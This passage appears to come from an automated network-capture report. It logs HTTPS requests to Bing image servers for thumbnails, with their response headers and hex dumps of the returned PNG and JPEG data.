2024-11-25 23:25:49 UTC	516	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:49 GMT Content-Type: image/png Content-Length: 1468 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:14 GMT ETag: 0x8DBDCB5E23DFC43 x-ms-request-id: 65376a0f-201e-0059-5391-3f6d81000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241125T232549Z-174f78459688l8rvhC1EWRtzr000000007300000000007hg Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:49 UTC	1468	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 51 49 44 41 54 78 01 ed 97 4b 6c 54 55 18 c7 ff e7 4e 19 62 da e0 b0 a1 01 03 5c 82 51 7c 52 16 1a 6d 6b 42 57 c4 c7 c2 2e 8c 26 24 46 62 44 17 26 b4 04 62 5c a0 ad 1a 63 dc c8 82 85 89 26 b4 09 68 89 1a a7 18 79 24 1a c6 05 75 41 02 17 19 23 46 03 13 10 4a 35 c8 50 fa 9a b9 f7 9c cf ef 3c ee 74 a6 96 76 da a6 2b e6 4b 4f ef cc b9 e7 9e ef 77 ff df e3 de 01 6a 56 b3 9a d5 ec ce 36 81 45 b6 cd 67 28 85 89 89 14 22 f8 20 e9 4b 0f 29 41 22 25 3c ac 85 42 8a a4 f2 a9 a8 52 8d e1 c5 d4 d5 70 75 3e 49 de a6 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaQIDATxKlTUNb\Q\|RmkBW.&$FbD&b\c&hy$uA#FJ5P<tv+KOwjV6Eg(" K)A"%<BRpu>I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.6	49879	2.16.158.83	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:48 UTC	367	OUT	GET /th?id=OADD2.10239337201808_1NREAF5SJS6TG8GUU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Connection: Keep-Alive
2024-11-25 23:25:49 UTC	627	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Type: image/png Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Content-Length: 1874 Date: Mon, 25 Nov 2024 23:25:49 GMT Connection: close Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.179e1002.1732577149.591df0e
2024-11-25 23:25:49 UTC	1874	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 06 e7 49 44 41 54 48 4b 95 93 0b 54 93 e7 19 c7 3f 2e 81 90 1b b7 ba a3 67 dd 7a a6 75 a7 83 40 88 dc ca aa d4 1d 94 02 02 81 90 ac 5e d0 8e e3 8e 5d 2f 93 22 0c 08 01 af 08 a2 a0 20 a2 50 44 ec 9c 73 dd d9 dc ea ac 68 5b 35 17 92 70 27 5c 12 12 42 a2 dc aa 88 a8 79 9f 8f 90 48 4b f6 26 fb 8e eb d6 d9 6d bf 73 fe e7 3b 39 e7 7d fe bf ef 79 bf 13 e2 bb 58 ad 34 ae e4 ca 47 8b b9 72 e3 17 5c b9 6e 3c 44 31 f0 24 44 d9 83 a3 9a 0c 51 de 54 87 2a db 8e 87 2a ff b2 9e f8 a3 d8 8b 1a f9 df e0 7d 31 f1 fd 08 d9 Data Ascii: PNGIHDRw=sRGBgAMAapHYsodIDATHKT?.gzu@^]/" PDsh[5p'\ByHK&ms;9}yX4Gr\n<D1$DQT**}1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.6	49884	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:48 UTC	346	OUT	GET /th?id=OADD2.10239378034177_1Y8HUQR0O0JRMMA4L&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-25 23:25:49 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 688858 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 1F119ABA1A8A434B92464F2C82D61B73 Ref B: EWR30EDGE0908 Ref C: 2024-11-25T23:25:49Z Date: Mon, 25 Nov 2024 23:25:48 GMT Connection: close
2024-11-25 23:25:49 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1a 3c 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 30 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 31 3a 30 32 20 30 38 3a 31 32 3a 31 39 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``<ExifMM*bj(1r2i``Adobe Photoshop 25.0 (Windows)2023:11:02 08:12:198
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: a9 39 a3 52 48 fe ec d4 7d ea 7c 94 c4 ad 0c c7 c7 16 fa 7f 94 f4 91 ff 00 b7 56 e0 5d d0 fc 94 73 17 ca 52 d9 4f ab 52 2f 95 55 ea 64 10 88 e8 1b 6d 4d 27 cd 4c 8d 6a 58 d6 a3 98 be 42 2f 2a a5 8e 3a 76 da 93 9a 8e 79 87 21 1e da 7e ca 5e 69 db aa 79 c0 8b ca a2 9d be 8a ae 70 e4 3b 7f 29 2a 29 e0 75 a9 63 6a 74 6d 5c 27 66 a5 3a 2a c4 90 27 f0 54 32 45 b6 b4 0d 46 d1 4d a7 50 1a 85 3a 9b 1d 4d cd 01 a9 1d 49 cd 1c d4 74 06 a4 9c d1 cd 47 45 01 a8 53 e3 a9 e0 81 3f 8e 9b 74 bb 7e e5 1c e1 a8 41 b1 aa e7 95 ba a0 d3 60 ab f0 25 66 1a 91 46 b4 49 05 4f f7 68 a9 0d 48 a4 f9 61 d9 51 4e db 69 f7 15 04 8d 40 6a 43 23 54 0e d4 f9 1a ab c8 d5 b4 43 51 db bd e9 f1 cf 55 fc da 54 a0 35 35 2d 67 ab 5f b9 96 1f 9e 1a c8 b7 a9 e0 b9 db 59 86 a3 6f a5 45 fb 95 57 75 Data Ascii: 9RH}\|V]sROR/UdmM'LjXB/:vy!~^iyp;))ucjtm\'f:*'T2EFMP:MItGES?t~A`%fFIOhHaQNi@jC#TCQUT55-g_YoEWu
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: 9f f0 37 4a 75 d4 ba dd e4 d2 a3 f8 93 c9 54 7d 9e 4f db de 67 ff 00 80 7f 7f e4 af 2a 7c 5b 08 7f cb a9 1a ff 00 63 d5 8f c4 7a c4 ca 96 70 f9 d7 73 43 6e a9 ff 00 2d a6 99 13 ff 00 43 a2 bc 62 7d 22 1b cb c8 92 f6 f2 ee 65 b6 f9 e6 fd f7 df ff 00 63 fd ca 2b 35 c5 dc da f2 1d 54 b2 07 52 3c ce 47 d2 76 bb 16 1d 94 f8 ff 00 75 36 fa c6 92 f9 22 fb 94 db ad 7d 3c 9d 89 5d fc 93 37 e7 81 a9 aa dc a3 56 1d d4 b5 4e eb 53 dd 54 a4 bc ae 88 51 31 9c cb b2 4f 50 ee dd 54 fc fa 74 73 d5 f2 99 73 97 51 a9 f1 b6 da ab 1c b5 24 72 a3 51 ca 05 d8 ee 5d 7f e5 b5 4b f6 e7 68 76 3c d5 97 e6 51 e6 54 72 15 ce 69 79 fb a8 91 9e b3 e3 96 9f 1c f4 72 07 39 6a 49 e6 5a 6f da 5e a1 f3 69 be 6d 1c 83 e7 25 f3 de 9d 1c ef 55 bc da 66 ea 39 08 34 bc d4 6f bf 4c dc 95 49 2a c4 Data Ascii: 7JuT}Og\|[czpsCn-Cb}"ec+5TR<Gvu6"}<]7VNSTQ1OPTtssQ$rQ]Khv<QTriyr9jIZo^im%Uf94oLI
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: 34 53 7d a2 d7 e7 4b 69 a1 b3 d8 89 37 fb ff 00 3d 71 7a 57 c5 4f 0f 4b 0e c4 87 50 7f 91 df c9 f3 b7 a2 3f df df bf fd ff 00 e0 ae 06 fb ed f6 76 77 56 c9 a9 5d cd 61 72 e8 fe 4c df f8 e5 61 dd 5c a4 1e 6d 9d 97 9d 12 de 6c 4f 3a 1f b9 bf fb 95 eb 61 78 7f 0f 13 cf 96 22 7c fc c7 a7 5a fc 48 f2 2c f5 29 b5 0b 38 74 f5 79 91 fc 9b 78 7e 7b 94 df f7 37 ff 00 72 b3 74 df 18 ea 4b e0 fb ab 3d 1f ec 96 fa 6d ca 3a 5c dc 5c 4d bf ed 3b df e7 d9 f2 7f c0 2b 8f be d3 f5 5d 42 c2 d6 cf ec 76 9b 6d ad be ce 97 1f df fe 3f fb ee aa fd 9b 52 b1 f0 f4 5a 24 b0 c3 e7 ff 00 cf 1f 39 2b d0 a5 97 61 a0 1f 58 f7 ce e3 4d f0 ae 9b e2 1d 56 2b 3b 8d 7b e6 74 fb 46 a5 35 bf c9 67 67 17 f7 13 fb f5 d5 49 e2 ad 07 c2 fe 1e ba d2 bc 1f 0f fa 45 b6 c4 fb 45 f5 9a 3c 37 2e 9f f2 Data Ascii: 4S}Ki7=qzWOKP?vwV]arLa\mlO:ax"\|ZH,)8tyx~{7rtK=m:\\M;+]Bvm?RZ$9+aXMV+;{tF5ggIEE<7.
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: d2 d3 75 ed 7b 4a ff 00 89 6c 5a c6 a1 f6 7b 97 74 4b 18 6f 1e 1f f8 1f c9 bd eb bf ea 35 69 7c 3c a3 e6 37 2d 7c 0b af 69 f7 97 57 3a 56 9b 77 a7 db ec d9 f6 88 66 44 df f3 ff 00 cb 1f e3 ae 3f 52 54 d0 6f 3e d3 2d 9c d6 37 08 ff 00 ea 6e 21 77 77 df fe c5 6e 78 c7 e2 24 d1 58 7f 65 4b 34 d0 da db 26 c7 9a 6f 9e 6f f8 03 d7 23 aa eb 97 96 d6 76 b7 96 57 9f 2e a4 ee 89 14 d0 f9 c8 88 9f 27 cf fd ca e9 c3 43 11 ff 00 2f 0c 67 3e 5f 84 8e 08 34 dd 5e 68 be c5 f6 b9 95 fe 7b 9f ef ef fb fb 12 a1 9d 93 f7 a8 9f 64 b1 67 7d 89 0f 93 f3 dc d5 ab 59 f5 2b 9b 0f b4 bd e5 a6 eb 9f b9 e4 d9 f9 3f 27 fb f5 4f 55 b1 9a 0f ec d7 79 a6 fb 53 ec ff 00 5d f7 36 6f af 46 31 32 9f 3c 8b b6 ba 64 da ad ff 00 87 ec ed fe c9 0a dc a6 fb c9 a6 87 67 c9 bf e7 aa f6 30 59 cb 35 Data Ascii: u{JlZ{tKo5i\|<7-\|iW:VwfD?RTo>-7n!wwnx$XeK4&oo#vW.'C/g>_4^h{dg}Y+?'OUyS]6oF12<dg0Y5
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: 00 ae fb 9b ff 00 d8 a6 e9 ba 45 87 93 e7 79 33 5b da c2 ff 00 27 da 3e 77 f9 fe fa 26 cf fd 93 e4 ff 00 6e ba 3f 86 6d 0a 53 a7 f1 8e d0 f5 0d 7a 7d 37 ed 32 d9 cd bb f7 3f b9 b8 bc ff 00 be dd df ff 00 64 ac bd 1e db 4d 8f 5c ff 00 4d 86 6b 8b ab cd f7 09 0c d7 88 8f bf fb 88 9f eb bf f6 4a e9 bc 41 e3 6d 37 48 f3 5e 18 61 86 d6 d9 25 77 9a 69 91 f6 7c 9f 71 21 44 77 af 37 d4 bc 51 a0 eb 5a dc b7 3a 7c 36 97 1e 20 4b 64 d9 6f f6 37 86 6f 27 ef ec 79 bc 9f 91 12 ba b0 fc f5 7e cf ba 74 51 ab ef fc 1c c7 45 3c ba 26 a1 34 57 36 96 7a 84 57 09 e4 bf d9 fc e7 48 53 7f dc df fc 7f ef ef ff 00 be 2a 08 ee 5e c6 fe 5b 3f 3a 1f fa f8 9b e7 85 dd 3f bf 0a 3e f7 7f e3 f9 3f dc aa 16 2b 60 d6 72 bc 30 da 4d 6e 89 be da fb ec 12 a7 d9 be e3 bf ee 5f f7 ce 9f f5 c7 Data Ascii: Ey3['>w&n?mSz}72?dM\MkJAm7H^a%wi\|q!Dw7QZ:\|6 Kdo7o'y~tQE<&4W6zWHS*^[?:?>?+`r0Mn_
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: 1b 0b 5b 3b bb c9 ae 2e 1d f7 f9 df c1 e7 3f f1 ff 00 df 75 72 e9 af 22 86 f1 12 6f e0 74 7f 27 67 dc 7f f7 eb 8b 11 87 fe 53 d1 a3 88 87 27 bc 60 ed 79 f5 09 7c ad 37 fd 16 d9 1d 2e 7c 99 be ff 00 dc d8 95 2c 90 3c 5e 21 ba bf 8a 1f 3a e3 ec c8 9f 67 86 64 7f f8 1d 4f 75 3c 31 4d 75 67 65 e4 c3 fe 8d fe ba 6f 9d f7 ff 00 7e b9 a9 2e 52 c7 5b ba 9a d6 69 a6 6f b3 6c 78 6d e6 44 de fb fe e6 cf e0 ae 85 87 f7 3d d3 93 eb be ff 00 bc 75 be 19 d5 5d 2c 7f b5 53 4d 9b fd 25 11 3f 83 fd 4f fb 95 e7 3a 96 a7 35 e7 ee 5e ce 69 a5 fb 4b ba 4d 0e cf f4 6d f5 d0 69 ba d3 df 68 91 3f 9d 37 d9 d3 ce d9 0c 3b f6 27 c9 fc 69 5c ef db 26 be bf 96 da ca ce 69 ae 3e ff 00 9d 37 ef 9f 67 f1 be ca f4 21 1f 73 94 f3 e7 3f 7f 9a 27 4b e1 cb c7 fe d2 95 fc e9 ae 1b ef fe fb e4 Data Ascii: [;.?ur"ot'gS'`y\|7.\|,<^!:gdOu<1Mugeo~.R[iolxmD=u],SM%?O:5^iKMmih?7;'i\&i>7g!s?'K
2024-11-25 23:25:49 UTC	16065	IN	Data Raw: b5 f8 87 df 78 b1 ef bc 61 a6 ea af e4 c2 b6 d7 90 fe fb ef fd c7 fe e7 dc a3 e1 4e b9 af 4f 79 2c da 54 37 77 12 d9 ea 57 77 09 37 93 f2 6f 7f f8 05 76 5e 11 d0 f4 dd 3f 55 fb 4f f6 6f db ae 37 fd a1 2d e6 9b fe 00 ef 58 de 16 74 bf b3 d6 e6 f0 c6 9d 14 4a f7 8f fe 8f 16 ff 00 93 7b fc 89 fe ff 00 df df 58 ca 46 b4 a5 0f e6 36 fc 07 73 a9 5a 7c 5d 96 e7 c4 1a 6e a1 63 6f 79 a5 4d fe bb 7a 7f 71 ff 00 8f 65 71 1e 3a d1 be dd e0 3f 0e 42 90 cd 63 6f fd a4 96 fe 4c df 26 ff 00 9f ef d7 5b e1 19 e1 83 5b b3 d5 75 5b 3d 3e 1b 04 b6 9b ed 30 fc ff 00 e9 3b dd 3e 4f bf 5d 1f 8f fc 43 e1 eb e9 a2 7f ec 78 7e 47 7b b4 f3 be 78 7c e4 f9 11 11 2b 2e 69 c6 a9 d3 2e 49 52 28 7c 27 8b fb 33 e1 17 fa 14 df 67 b7 d4 be d1 fe ba 1f ee 3c db 11 1f ee 3b ff 00 7d 2a 28 34 Data Ascii: xaNOy,T7wWw7ov^?UOo7-XtJ{XF6sZ\|]ncoyMzqeq:?BcoL&[[u[=>0;>O]Cx~G{x\|+.i.IR(\|'3g<;}*(4
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: 43 ec ce ee 9e 74 3f 23 c3 f7 12 6f fd 9f ee 54 56 36 c9 a5 5e 5f be a1 fe 91 6e f6 d0 ef b8 b7 85 df e7 9a 67 ff 00 be eb d3 c3 c8 e4 c4 47 98 e8 ec 65 9a 0b 3b 38 53 fb 42 fa ea e7 63 f9 33 4d f2 7f e3 ff 00 ef ef ab 16 b3 de 69 9a 24 b6 6f a9 7c c9 72 ee f3 7c 9f c7 f2 7c 95 cd f8 72 f1 f5 7d 56 29 ae 21 9a dd 52 d9 d1 26 86 67 47 f9 eb a4 d6 3c 3d b6 c2 29 bc 98 76 be c4 49 a5 9b e4 44 4f bf f2 57 9f 98 4e 94 bd d3 bb 05 09 c3 de 39 7d 63 43 d4 af 35 5b 34 d3 74 18 75 6b 87 4f b4 3d f5 c7 ee 5d 36 3f c8 8e ff 00 dc ad 1d 2b 4f bc 5b f8 be db e7 7d ab 67 fa 4c 3f 26 cd ff 00 ef ff 00 b1 5d 5f 86 62 b3 82 1f de ea 53 5c 33 a6 c9 ae 2e 26 44 f9 ff 00 8e b0 75 8d 3d ef a1 ba d4 93 ce 99 53 66 cf 3b 7f cf f7 f7 ef 4a 30 33 9c bf c2 18 de 48 c3 de f8 8d ed Data Ascii: Ct?#oTV6^_ngGe;8SBc3Mi$o\|r\|\|r}V)!R&gG<=)vIDOWN9}cC5[4tukO=]6?+O[}gL?&]_bS\3.&Du=Sf;J03H
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: d9 be 7f ee 7c ef ff 00 d8 53 7c 41 2f 9f 0c 57 3f e9 73 5a dc fc e9 e7 6f ff 00 49 87 ee 3b ef fb f5 87 3e ab 67 63 37 d8 ef 7f e7 cf ca 4f df 3b bd b5 c3 ff 00 e8 75 db 03 a6 07 4d 7d ad 69 4d 79 a1 d9 cb a3 c3 0d 85 9e f7 b9 9a 19 be 4b 97 78 7e 4f bf 5c f6 86 ce f6 11 42 f0 ff 00 a2 a5 e6 ff 00 dc cd f7 3f cf f7 ea fc 8c 9e 25 bf 96 f2 ef 4d fb 3b 3d b6 cf 26 c6 1d 90 fc 89 f2 3a 27 fb 9f 7f ee 6c ac 98 35 ed 35 bc dd 1f ec 7f 67 b5 f9 11 26 8b fd 72 7f bf 5d 27 6f 39 ad e2 ad 2a c1 6c 3e d9 a8 69 b3 7d a1 dd 1d e1 9a f3 f8 3e fe fd 9f f0 3a d4 f0 fc 4f 3f c9 14 3f 67 d1 92 d9 1d 26 9b f7 cf ff 00 4d 6a ac 0b a5 25 fc a9 a8 6b 13 5c 2d ca 7f ae b8 9b 7e f4 fe 0f f8 1d 69 41 f6 3d 23 4a 95 f4 fd 4a 19 ac 2f 11 ed fe cf 34 df e9 37 3f 26 f7 d9 fc 7f 7e Data Ascii: \|S\|A/W?sZoI;>gc7O;uM}iMyKx~O\B?%M;=&:'l55g&r]'o9*l>i}>:O??g&Mj%k\-~iA=#JJ/47?&~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.6	49883	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:48 UTC	375	OUT	GET /th?id=OADD2.10239402415504_17DDWI2WCHUD2N4TB&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-25 23:25:49 UTC	856	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 380972 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 7DFB51F034AD42EFB5F9C7E34C6DFDBB Ref B: EWR311000107009 Ref C: 2024-11-25T23:25:49Z Date: Mon, 25 Nov 2024 23:25:48 GMT Connection: close
2024-11-25 23:25:49 UTC	15528	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 20 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 31 32 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 34 3a 31 30 3a 32 34 20 31 31 3a 30 33 3a 30 35 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 07 80 00 00 a0 03 00 03 00 00 00 01 04 38 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1 r2i``Adobe Photoshop 25.12 (Windows)2024:10:24 11:03:058C
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: a6 f9 3c c1 8e a3 a7 43 d3 d6 bd 1c 05 2a 75 6a 72 4d 1c b9 95 4a d4 28 fb 5a 4d 69 ba 6b 73 a9 b1 d4 62 97 e7 0d 56 e7 94 49 0d 78 dd ae b9 aa e9 77 8d 0c be 64 52 c7 f7 a2 99 7e 65 ad 68 fc 71 a8 85 c1 8a 06 fc eb d1 a9 93 d5 52 f7 0f 2a 97 11 d0 69 7b 54 d3 3d 1d 25 1d 0d 6b 59 e8 37 77 36 ad 7f 6e cb 2c 50 ae 5b 6f cd 5e 6b a5 f8 ca da 56 5f b4 ab 44 7f 8b f8 85 7a 2f c2 6f 1e 69 1a 65 e5 d4 52 af da a1 ba 51 e6 47 1b 0e df 5e d5 c9 53 07 56 9f c4 8e c9 66 b4 ea d3 e6 c3 c9 37 db bf de 75 1e 1f bb d1 bc 21 a7 cf 16 b7 12 c5 1e a0 a5 be d6 d1 96 49 03 26 70 0f b7 b5 79 7f 89 b4 e4 9f 47 d4 35 27 55 95 77 34 96 ca 8a 55 d4 7b f7 35 d2 fc 41 d6 07 89 3c ab 72 ab 1d a4 12 19 62 8d a4 dd b7 27 f2 1e 94 78 5e 44 9e df fd 1b 6c f3 7c c1 63 5c 32 e4 74 06 a6 Data Ascii: <CujrMJ(ZMiksbVIxwdR~ehqRi{T=%kY7w6n,P[o^kV_Dz/oieRQG^SVf7u!I&pyG5'Uw4U{5A<rb'x^Dl\|c\2t
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: db f9 72 6c 35 f7 59 76 29 56 a2 af ba 3f 1d cf b2 e7 84 c4 b7 1d 9e a7 49 a6 df 5a 6a b0 c7 6d aa ca d1 79 7b 45 b4 b6 d1 a2 a4 23 a3 19 06 32 dc 7b d4 77 56 90 db ea 0d 15 bd e4 77 51 2b 63 cf 6f 91 5b f3 ed 59 9e 1d bd 1a 75 e7 9e 60 5b 9d aa 47 97 23 1d 99 3c 64 e3 d2 b5 af e7 d2 e4 ba 69 6c ad a4 82 de 48 c7 97 1c b7 3e 63 c6 ff 00 c4 78 03 82 7b 1e 95 dd 24 ac 78 31 72 4f c8 4b 93 68 ca d2 48 ad 24 d2 37 cc b0 e1 11 7e 9c 54 77 16 fa 74 f6 72 ba 4b 3c 17 51 b0 f2 e0 92 3d eb 20 ee 77 f1 b4 fe 15 a9 a5 7f 65 dd aa c0 fa 54 f3 cd 24 65 15 6d a7 3b 9a 43 d1 b1 cf 4f 41 55 f5 49 f5 03 71 15 cc f2 34 13 5b 30 10 33 47 b5 b2 87 8c b6 3e 66 1e f5 3c a5 3a 9d 0c 89 b4 db 8b 66 d9 3c 13 c5 27 f0 ac 91 15 eb 51 a2 9d d8 35 d5 f8 93 c7 3a fe bd 66 91 f8 8e 2b Data Ascii: rl5Yv)V?IZjmy{E#2{wVwQ+co[Yu`[G#<dilH>cx{$x1rOKhH$7~TwtrK<Q= weT$em;COAUIq4[03G>f<:f<'Q5:f+
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: c4 6d 3f ed 3e 13 f1 05 b5 d3 2f 12 da 3f ee e7 84 fa 34 6d 83 fd 2b f3 51 ac fc be 63 dc df ec d3 24 28 b3 2c b0 45 24 57 51 36 e8 e5 8a 42 ae a3 d9 86 08 fa e6 b3 9c 23 3d d6 a7 34 f0 3f c8 ec 7e af b2 e5 b9 eb 49 b7 da be 12 f8 23 fb 50 7c 40 f0 ad ac 5a 3e b3 6d ff 00 09 6d 9c 0a 15 12 ee 61 1d dc 60 7a 4d d1 ff 00 e0 43 3e f5 ef 9e 03 fd ab 3e 1a 6b 5a 94 5a 67 88 62 d5 3c 25 7d 2e 36 ff 00 6b c2 16 0c 9e de 72 92 bf 89 c5 73 cb 0f 35 aa d5 1c 92 84 e1 f1 23 dc 71 4b b6 a3 b1 ba b5 bd b3 4b ab 1b 98 6e 6d a5 5c c7 2c 12 07 46 1e c4 71 53 57 2c 9b 4e cc 9d c6 6d a3 6d 49 8a 31 4a f7 02 3d b4 6d a7 e3 da 95 56 8e 60 b0 cd b4 6d a7 e3 de 8c 51 71 d8 66 da 36 d3 b3 4b 8f 7a 2e 85 66 47 b6 97 6d 39 85 18 f6 a0 6d 58 6e d3 46 da 7e 28 c5 2b 88 63 2d 1b 69 Data Ascii: m?>/?4m+Qc$(,E$WQ6B#=4?~I#P\|@Z>mma`zMC>>kZZgb<%}.6krs5#qKKnm\,FqSW,NmmI1J=mV`mQqf6Kz.fGm9mXnF~(+c-i
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: 64 e7 d7 91 53 3a 6f 6b 1a 53 c4 47 ab b2 38 19 a3 31 36 c7 ea bf dd a1 00 3c 96 ae 97 5c f0 bf 88 2c 26 8c ea 9a 53 5b c8 ca 04 70 49 84 79 87 41 b5 7a b7 bd 55 4d 32 da 69 23 cf ee 2e 37 61 a0 e5 99 8f b2 75 ac 1c 5a 3a e9 ce 12 5a 3b 98 6a ae 5b 0a dc d6 9e 9b a4 6a 17 11 ac 90 59 c9 2c 4d 26 cf 35 63 2e 99 f4 ca 8a e8 34 5f 09 cf 79 75 bf ec aa d1 b4 9b 62 dd 1b c7 1b 11 d3 39 c1 00 9f 5a f5 0f 0e f8 12 f7 40 f0 ed cb dd df 47 a6 c5 1e d9 27 59 6e cc 8c c4 ff 00 0a db c3 93 c6 78 2c 73 58 4a bd 18 7c 52 3b 63 85 c5 4d 7e ee 1b f7 d1 1e 55 a5 68 ba 74 52 2c 97 92 fd a6 48 db 12 d9 43 3f 97 33 67 a1 4f 94 f0 3d c5 6d e8 b6 96 ed 7c a5 34 e5 b6 54 63 b6 39 18 b3 7d 5d 9b a9 f7 c5 7a 1d c6 93 61 6b 